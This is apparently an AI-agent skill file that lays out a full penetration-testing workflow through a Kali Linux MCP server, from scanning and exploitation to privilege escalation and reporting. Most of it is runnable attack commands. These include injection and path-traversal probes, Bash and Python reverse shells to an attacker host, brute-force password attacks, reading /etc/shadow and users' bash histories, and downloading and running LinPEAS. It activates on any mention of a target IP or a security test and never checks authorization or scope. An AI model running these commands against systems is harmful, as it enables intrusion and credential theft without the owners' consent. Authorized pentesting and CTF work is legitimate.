Penetration Testing Skill

This skill guides AI agents through professional penetration testing workflows using the Kali Linux MCP server environment.

Core Principles

• Always log actions - Maintain detailed documentation of all commands and findings

• Use timeouts - Network commands must include timeouts to prevent hanging

• Install tools first - Never assume tools are pre-installed in the container

• Be methodical - Follow a structured testing methodology

• Generate reports - Always conclude with comprehensive vulnerability documentation

• Understand before exploiting - NEVER deploy an exploit without first researching and understanding exactly how it works, what it does, and what the risks are

Prerequisites

Before starting any assessment:

Verify Kali MCP container status

kali-container-status

Install essential tools

kali-exec "apt-get update && apt-get install -y nmap nikto hydra dirb netcat-traditional dnsutils curl wget"

Testing Methodology

Phase 1: Reconnaissance

Objective: Identify all attack surfaces, services, and potential entry points.

Essential Steps:

• Port Scanning:

Quick scan of top ports

kali-exec "timeout 120s nmap -T4 --top-ports 1000 [TARGET_IP]"

Full TCP scan with version detection

kali-exec "timeout 300s nmap -sV -sC -p- [TARGET_IP] -oN scan_results.txt"

UDP scan (common ports)

kali-exec "timeout 300s nmap -sU --top-ports 100 [TARGET_IP]"

• Service Enumeration:

HTTP/HTTPS service identification

kali-exec "curl -m 10 -I http://[TARGET_IP]"

Banner grabbing

kali-exec "timeout 5s nc -v [TARGET_IP] [PORT]"

DNS enumeration if applicable

kali-exec "dig @[TARGET_IP] ANY"

• Web Application Discovery (if web server present):

Install web tools

kali-exec "apt-get install -y gobuster nikto whatweb"

Directory enumeration

kali-exec "timeout 600s gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirb/common.txt"

Web vulnerability scan

kali-exec "timeout 300s nikto -h http://[TARGET_IP] -o nikto_results.txt"

Technology identification

kali-exec "whatweb http://[TARGET_IP]"

• SMB/FTP Enumeration (if applicable):

Install enum tools

kali-exec "apt-get install -y smbclient enum4linux"

SMB enumeration

kali-exec "timeout 60s enum4linux -a [TARGET_IP]" kali-exec "timeout 30s smbclient -L //[TARGET_IP] -N"

FTP anonymous access check

kali-exec "timeout 10s ftp -n [TARGET_IP] <<EOF quote USER anonymous quote PASS anonymous ls quit EOF"

Documentation: Log all discovered services, versions, and open ports to pentest_log.md .

Phase 2: Vulnerability Assessment

Objective: Identify exploitable vulnerabilities in discovered services.

Essential Steps:

• CVE Research:

Install searchsploit

kali-exec "apt-get install -y exploitdb"

Search for known exploits

kali-exec "searchsploit [SERVICE_NAME] [VERSION]"

• Default Credentials Testing:

Common credentials for discovered services

Web admin panels: admin/admin, admin/password

SSH: root/root, admin/admin

Database: root/(blank), postgres/postgres

• Web Vulnerability Testing (if applicable):

SQL Injection detection

kali-exec "curl -m 10 'http://[TARGET_IP]/page?id=1%27' | grep -i error"

Command injection in parameters

kali-exec "curl -m 10 'http://[TARGET_IP]/endpoint?cmd=;id' | grep uid"

Path traversal

kali-exec "curl -m 10 'http://[TARGET_IP]/file?path=../../../../etc/passwd'"

LFI/RFI testing

kali-exec "curl -m 10 'http://[TARGET_IP]/page?file=../../../../../../../etc/passwd'"

• Automated Vulnerability Scanning:

Install vulnerability scanners

kali-exec "apt-get install -y sqlmap wpscan"

SQL injection with sqlmap

kali-exec "timeout 300s sqlmap -u 'http://[TARGET_IP]/page?id=1' --batch --level=2"

WordPress scanning if applicable

kali-exec "timeout 300s wpscan --url http://[TARGET_IP] --enumerate u,p"

Documentation: Log all identified vulnerabilities with severity ratings in pentest_log.md .

Phase 3: Exploitation

Objective: Gain initial access to the target system.

⚠️ CRITICAL: Exploit Research Requirement Before attempting ANY exploit, you MUST thoroughly research and understand it. Never deploy an exploit blindly.

Essential Steps:

• Exploit Research (MANDATORY):

Before using any exploit, complete this research checklist:

• Identify the CVE/Exploit-DB ID: Know the exact vulnerability being exploited

• Understand the vulnerability class: What type of bug is it? (Buffer overflow, RCE, SQLi, deserialization, etc.)

• Read the technical details: Understand HOW the exploit works at a technical level

• Verify target compatibility: Confirm the target version/configuration is vulnerable

• Understand the payload: Know exactly what code will execute and its effects

• Identify prerequisites: What conditions must exist for successful exploitation?

• Know the indicators: What artifacts/logs will be created?

• Plan for failure: What happens if the exploit fails? Will it crash the service?

Research Commands:

Search for exploit details

kali-exec "searchsploit -x [EXPLOIT_ID]" # Read the exploit code and comments

Research CVE details

kali-exec "curl -s 'https://cveawg.mitre.org/api/cve/CVE-XXXX-XXXX' | jq ."

Check exploit-db for writeups and details

kali-exec "searchsploit -w [EXPLOIT_ID]" # Get Exploit-DB URL for full details

Read exploit source code to understand mechanism

kali-exec "searchsploit -m [EXPLOIT_ID] && cat [EXPLOIT_FILE] | head -100"

Document Your Understanding: Before proceeding, log in pentest_log.md :

• Exploit name and ID (CVE/EDB)

• Vulnerability type and root cause

• How the exploit achieves code execution

• Expected behavior on success/failure

• Any modifications needed for target environment

• Exploit Preparation:

Download exploit if needed

kali-exec "wget -T 30 [EXPLOIT_URL] -O exploit.py"

ALWAYS review exploit code before execution

kali-exec "cat exploit.py | head -50" # Check exploit header/comments kali-exec "grep -n 'payload|shell|cmd|exec' exploit.py" # Identify payload sections

Make executable

kali-exec "chmod +x exploit.py"

• Reverse Shell Setup:

Start netcat listener (in background, document the listener IP:PORT)

Note: This requires separate terminal or background process management

Common reverse shell payloads:

Bash: bash -i >& /dev/tcp/[ATTACKER_IP]/[PORT] 0>&1

Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ATTACKER_IP]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

• Exploitation Execution:

Use discovered vulnerability

kali-exec "timeout 60s python3 exploit.py [TARGET_IP] [PORT]"

Or manual exploitation

kali-exec "curl -m 30 -X POST 'http://[TARGET_IP]/vulnerable_endpoint' -d 'param=[PAYLOAD]'"

• Post-Exploitation Initial Enumeration:

Stabilize shell

kali-exec "python3 -c 'import pty; pty.spawn("/bin/bash")'"

System information

kali-exec "uname -a" kali-exec "cat /etc/*-release"

Current user and privileges

kali-exec "id" kali-exec "sudo -l"

Documentation: Log successful exploitation method, payloads used, and initial access level.

Phase 4: Privilege Escalation

Objective: Escalate privileges from initial access to root/administrator.

Essential Steps:

• Linux Enumeration:

SUID binaries

kali-exec "find / -perm -4000 -type f 2>/dev/null"

Writable files/directories

kali-exec "find / -writable -type f 2>/dev/null | grep -v proc"

Cron jobs

kali-exec "cat /etc/crontab" kali-exec "ls -la /etc/cron.*"

Capabilities

kali-exec "getcap -r / 2>/dev/null"

• Credential Hunting:

Search for credentials in common locations

kali-exec "grep -r 'password' /home /var/www /opt 2>/dev/null | head -20"

Bash history

kali-exec "cat ~/.bash_history" kali-exec "cat /home/*/.bash_history 2>/dev/null"

Configuration files

kali-exec "find /etc /var /opt -name '.conf' -o -name '.cfg' 2>/dev/null"

Database credentials

kali-exec "cat /var/www/html/config.php 2>/dev/null"

• Automated Enumeration (if possible to upload):

Download LinPEAS

kali-exec "wget -T 30 https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh" kali-exec "chmod +x /tmp/linpeas.sh" kali-exec "timeout 120s /tmp/linpeas.sh"

• Common Privilege Escalation Techniques:

GTFOBins - SUID binary exploitation

Example: if find has SUID

kali-exec "find . -exec /bin/sh -p \; -quit"

Sudo exploitation

Check if sudo version is vulnerable

kali-exec "sudo --version"

Kernel exploits (check version first)

kali-exec "searchsploit linux kernel [VERSION]"

Documentation: Log privilege escalation vector, commands used, and final access level achieved.

Phase 5: Objective Completion

Objective: Retrieve flags, sensitive data, or complete mission objectives.

Essential Steps:

• Flag Discovery:

Common flag locations

kali-exec "find / -name 'user.txt' -o -name 'flag.txt' -o -name 'root.txt' 2>/dev/null"

Search in home directories

kali-exec "cat /home/*/user.txt 2>/dev/null" kali-exec "cat /root/root.txt 2>/dev/null"

Search by content pattern

kali-exec "grep -r 'flag{' / 2>/dev/null"

• Data Exfiltration (if authorized):

Document sensitive files found

kali-exec "ls -la /etc/shadow /etc/passwd"

Dump hashes if root

kali-exec "cat /etc/shadow"

Documentation: Record all flags found with their locations and access method.

Report Generation

After completing the assessment, generate a comprehensive vulnerability report.

Required Report Sections

Create a file named vulnerability_report.md with the following structure:

1. Executive Summary

• High-level findings overview

• Overall security posture assessment

• Business impact summary

• Risk rating (Critical/High/Medium/Low)

2. Scope and Methodology

• Target information (IP addresses, domains)

• Testing timeframe

• Tools used

• Testing methodology followed

3. Detailed Findings

For each vulnerability discovered, include:

• Vulnerability Title: Clear, descriptive name

• Severity: Critical/High/Medium/Low

• CVSS Score: If applicable

• Affected Component: Service, port, or application

• Description: Technical explanation of the vulnerability

• Proof of Concept: Exact commands/steps to reproduce

• Impact: What an attacker could achieve

• Remediation: Specific steps to fix the vulnerability

• References: CVE numbers, exploit-db links, etc.

4. Technical Appendix

• Complete command history from pentest_log.md

• Network diagrams (if applicable)

• Screenshots or command outputs

• Discovered credentials (sanitized for report)

5. Recommendations

• Prioritized remediation plan

• Security hardening guidelines

• Monitoring and detection recommendations

Report Template

Vulnerability Assessment Report

Executive Summary

[High-level overview of findings and risk]

Scope

• Target: [IP/Domain]
• Date: [Assessment Date]
• Tester: AI Security Agent
• Methodology: OWASP Testing Guide, PTES

Findings Summary

Detailed Findings

Finding 1: [Vulnerability Name]

Severity: Critical CVSS: 9.8 Affected Component: [Service/Port]

Description: [Technical explanation]

Proof of Concept:

[Commands used]

Impact:
[What attacker can do]

Remediation:
[How to fix]

References:

- CVE-XXXX-XXXX

- https://example.com/advisory

[Repeat for each finding]

Technical Details

[Full command history and outputs]

Recommendations

- [Priority 1 action]

- [Priority 2 action]
...

## Common Pitfalls to Avoid

1. **Hanging Commands**: Always use timeouts
   - ❌ `nc [IP] [PORT]`
   - ✅ `timeout 5s nc [IP] [PORT]`

2. **Assuming Tool Availability**: Always install first
   - ❌ `nmap [TARGET]`
   - ✅ `apt-get install -y nmap && nmap [TARGET]`

3. **Incomplete Logging**: Document everything
   - Log successful AND failed attempts
   - Note reasoning for each action
   - Track all credentials discovered

4. **Premature Optimization**: Be thorough before exploiting
   - Complete enumeration before attacking
   - Try multiple approaches
   - Don't fixate on one attack vector

5. **Blind Exploitation**: NEVER run an exploit without understanding it
   - ❌ Download exploit and run immediately
   - ✅ Research CVE, read exploit code, understand mechanism, then execute
   - Always know: What vulnerability? How does it work? What does the payload do?
   - Read exploit source code comments and documentation first
   - Verify target version matches exploit requirements

## Advanced Techniques

### Custom Script Development

When existing tools don't work, create custom scripts:

```bash
# Python port scanner
kali-exec "cat > /tmp/scanner.py << 'EOF'
import socket
import sys

target = sys.argv[1]
for port in [21,22,23,25,80,443,3306,8080]:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2)
    result = sock.connect_ex((target, port))
    if result == 0:
        print(f'Port {port}: OPEN')
    sock.close()
EOF"

kali-exec "python3 /tmp/scanner.py [TARGET_IP]"

Password Attacks

# Install Hydra
kali-exec "apt-get install -y hydra"

# SSH brute force with common passwords
kali-exec "timeout 300s hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[TARGET_IP]"

# HTTP form brute force
kali-exec "timeout 300s hydra -l admin -P /usr/share/wordlists/rockyou.txt [TARGET_IP] http-post-form '/login:username=^USER^&password=^PASS^:F=incorrect'"

Pivoting and Tunneling

# Discover internal networks
kali-exec "ip route"
kali-exec "cat /etc/hosts"

# Port forwarding for access to internal services
# (Requires persistent shell session)

Success Indicators

Your penetration test is successful when you have:

-  Comprehensive enumeration data logged

-  All discovered vulnerabilities documented

-  Successful exploitation demonstrated with proof

-  Privilege escalation achieved (if possible)

-  Objectives completed (flags found, data accessed)

-  Complete command history maintained

-  Professional vulnerability report generated

Quick Reference

Essential One-Liners

# Install base toolkit
apt-get update && apt-get install -y nmap nikto hydra dirb netcat-traditional curl wget exploitdb

# Quick recon
nmap -T4 -p- [TARGET] && curl -m 10 -I http://[TARGET]

# Web directory scan
gobuster dir -u http://[TARGET] -w /usr/share/wordlists/dirb/common.txt -t 50

# Search exploits
searchsploit [SERVICE] [VERSION]

# Python reverse shell (URL encoded)
python%20-c%20%27import%20socket,subprocess,os;s=socket.socket();s.connect((%22[IP]%22,[PORT]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([%22/bin/sh%22,%22-i%22])%27

# SUID find
find / -perm -4000 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null

Additional Resources

For deeper technical reference, see:

- references/ATTACK_PATTERNS.md - Common attack patterns and payloads

- references/TOOLS_REFERENCE.md - Comprehensive tool usage guide

- scripts/auto_enum.sh - Automated enumeration script

Skill Activation

This skill should be activated when:

- User mentions "penetration test", "pentest", "security assessment"

- User mentions "CTF", "hack the box", "try hack me"

- User provides a target IP or asks to test security

- User mentions "vulnerability scan" or "exploit"

- User asks to find flags or gain root access

- User mentions Kali Linux or security tools

Once activated, follow the methodology phases sequentially, maintaining detailed logs throughout the assessment.